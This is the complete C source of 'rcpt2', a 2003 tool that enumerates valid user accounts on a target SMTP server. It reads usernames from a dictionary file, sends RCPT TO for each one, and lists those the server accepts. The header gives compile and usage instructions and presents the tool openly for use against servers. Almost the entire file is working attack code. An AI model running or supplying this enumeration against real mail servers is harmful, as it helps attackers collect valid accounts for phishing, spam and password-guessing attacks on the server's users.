/*	
rcpt2		SMTP (RCPT TO) User enumeration.
Date:           29.11.2003
Author:         B-r00t. <br00t@blueyonder.co.uk>
Webpage:	Http://doris.scriptkiddie.net
IRC:		doris.scriptkiddie.net:6969 - SSL
                                                                     
Compile:        gcc -o rcpt2 rcpt2.c
                                                                                           
Description:	Uses a dictionary to enumerate user accounts via
		SMTP (RCPT TO). Ensure that the SMTP server is
		vulnerable manually before using this tool.


rpct2 by B-r00t. (c) 2003.
 
Usage: rcpt2 <USERLIST> <HOST>
       rcpt2 usernames.txt smtp.acme.com

ENJOY!
*/

//Includes
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

//Defines
#define	PORT		25
#define	BUFFSIZE	2048
#define	NAME		"rcpt2"
#define HELO		"HELO doris.scriptkiddie.net\n"
#define MAIL		"mail from:<hax0r@doris.scriptkiddie.net>\n"
#define RCPT2		"rcpt to: "

/* Color definitions */
#define YELLOW          "\E[33m\E[1m"
#define RED             "\E[31m\E[1m"
#define BLUE            "\E[34m\E[1m"
#define NORMAL          "\E[m"

//Prototypes
int usage(char *progname);
int get_connect (int port, char *host);
int send_sock (int sock, char *buff);
int read_sock (int sock, char *buff);

//Mighty Main
int main (int argc, char *argv[])
{
// argv[1] = usernames
// argv[2] = hostname
	int	sock, bytes;
	FILE 	*ifp;
        char    sockbuff[BUFFSIZE], username[255], rcpt[300];
        memset(sockbuff, '\0', sizeof(sockbuff));

        printf("\n%s%s by B-r00t. (c) 2003.%s", BLUE, NAME, NORMAL);

	if (argc < 3) usage(argv[0]);

	if ( (ifp = fopen(argv[1], "r")) == NULL)
        {
        printf("\nFile %s ", argv[1]);
        fflush(stdout);
        perror("[fopen] ");
        exit(2);
        }

	printf("%s\nUsernames from: %s", RED, argv[1]);
	printf("\nRCPT TO username enumeration on %s.\n\n", argv[2]);
	printf("%s", NORMAL);

	//Connect
        sock = get_connect(PORT, argv[2]);
        if (sock == -1) {
                                printf("Error: Connection Failed!");
                                exit(-1);
                                }

        //SMTP Banner
        bytes = read_sock (sock, sockbuff);
        printf("%s\nBANNER: %s", YELLOW, sockbuff);

        //Send HELO
	printf("\nSEND: %s%s", YELLOW, HELO);
        send_sock (sock, HELO);

        //Read the result
        bytes = read_sock (sock, sockbuff);
        printf("%sRECV: %s", YELLOW, sockbuff);

	memset(sockbuff, '\0', sizeof(sockbuff));

        //Send MAIL FROM
	printf("%s\nSENT: %s", YELLOW, MAIL);
        send_sock (sock, MAIL);

        //Read the result
        bytes = read_sock (sock, sockbuff);
        printf("RECV: %s", sockbuff);
	printf("%s\n\n", NORMAL);

	while ( ! feof(ifp) )
        {
        fgets(username, 255, ifp);

        if (ferror(ifp)) {
                        printf("\nError [ferror] %s", argv[1]);
                        fclose(ifp);
                        exit(4);
                        }

	//Build RCPT TO	
	strcpy (rcpt, RCPT2);
	strcat (rcpt, username);

        //Send RCPT TO
	send_sock (sock, rcpt);

        //Read the result
        bytes = read_sock (sock, sockbuff);

        //Were we successfull?            
	if ( strstr(sockbuff, "250")) printf("VALID_USER: %s", username);
	
	}
	//RSET mailserver & QUIT
	printf("\n\nSending RSET & QUIT to %s\n", argv[2]); 
	send_sock (sock, "RSET\n");
	send_sock (sock, "QUIT\n");
sleep(1);
close(sock);
fclose(ifp);
printf("\nOk Done!\n\n\n");
exit(0);
}//End_Main

	
//Do Socket Connect
int get_connect (int port, char *host)
{
	int sock;
        struct sockaddr_in dest_addr;
	struct hostent *target;

	
	if ((target=gethostbyname(host)) == NULL) {
      	herror("gethostbyname");
      	exit(-1);
	}

	if ((sock=socket(AF_INET, SOCK_STREAM, 6)) == -1)
                                        {
                                        perror("\nsocket");
                                        return -1;
					}
	
        dest_addr.sin_family = AF_INET;
        dest_addr.sin_port = htons(port);
	dest_addr.sin_addr = *((struct in_addr *)target->h_addr);
        
	memset( &(dest_addr.sin_zero), '\0', 8);
        if (connect (sock, (struct sockaddr *)
	&dest_addr, sizeof (struct sockaddr)) == -1)
                {
                perror("\nconnect");
                close(sock);
                exit(-1);
                }
        else return sock;
}

//Send Data To Socket
int send_sock (int sock, char *buff)
{
        int remaining, total, bytes;
        remaining = strlen(buff);
        total = 0;
        do {
        bytes = 0;
        bytes = (send (sock, buff, strlen(buff), 0));
                if (bytes == -1)
                {
                perror("send");
                close(sock);
                exit(-1);
                }
        remaining -= bytes;
        buff += bytes;
        total +=bytes;
        } while (remaining);
        return total;
}


//Read Data From Socket
int read_sock (int sock, char *buff)
{
        int bytes = 0;
	memset(buff, '\0', sizeof(buff));
        bytes = (recv (sock, buff, BUFFSIZE-1, 0));
                if (bytes == -1)
                {
                perror ("\nrecv");
                close(sock);
                exit(-1);
                }
        else return bytes;
}

//Usage    
int usage(char *progname)
{
	printf("%s\n\nUsage:\t%s <USERLIST> <HOST>", RED, progname);
       	printf("\n\t%s usernames.txt smtp.acme.com", progname);
	printf("%s\n\n", NORMAL);
	exit(-1);
} 
// D-O-R-I-S
// Doris Only Really Interests Scriptkiddies...
// ENJOY!